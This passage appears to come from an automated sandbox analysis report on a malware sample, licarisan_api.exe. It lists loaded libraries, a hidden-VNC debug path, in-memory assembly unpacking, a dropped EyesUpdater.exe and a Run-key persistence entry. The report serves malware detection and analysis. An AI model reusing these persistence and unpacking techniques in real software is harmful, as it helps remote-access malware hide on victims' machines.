                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: licarisan_api.exeStatic file information: File size 4038008 > 1048576
                  Source: licarisan_api.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x312e00
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdb source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdbJ source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, 2A4ZY3PGYZLX.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.csc.exe.852cc18.1.raw.unpack, HVNC.cs.Net Code: listitems System.AppDomain.Load(byte[])
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                  Source: C:\Users\user\Desktop\licarisan_api.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_00425A27 push edi; ret 0_2_00425AAE
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007B3C5D push ds; retn 0000h0_2_007B3C62
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007BDF32 push ss; iretd 0_2_007BDF3E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CB47E pushfd ; retf 0_2_007CB480
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CB4E4 pushfd ; retf 0_2_007CB4E6
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CD136 push eax; retf 0_2_007CD138
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CCF7E push esp; retf 0_2_007CCF7F
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CCF19 push esp; retf 0_2_007CCF1E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007CCF8D push eax; retf 0_2_007CCF8E
                  Source: C:\Users\user\Desktop\licarisan_api.exeCode function: 0_2_007FCBF7 push 81000066h; retf 0_2_007FCBFC
                  Source: C:\Users\user\Desktop\licarisan_api.exeFile created: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\licarisan_api.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OcuulusUpdaterJump to behavior
                  Source: C:\Users\user\Desktop\licarisan_api.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OcuulusUpdaterJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
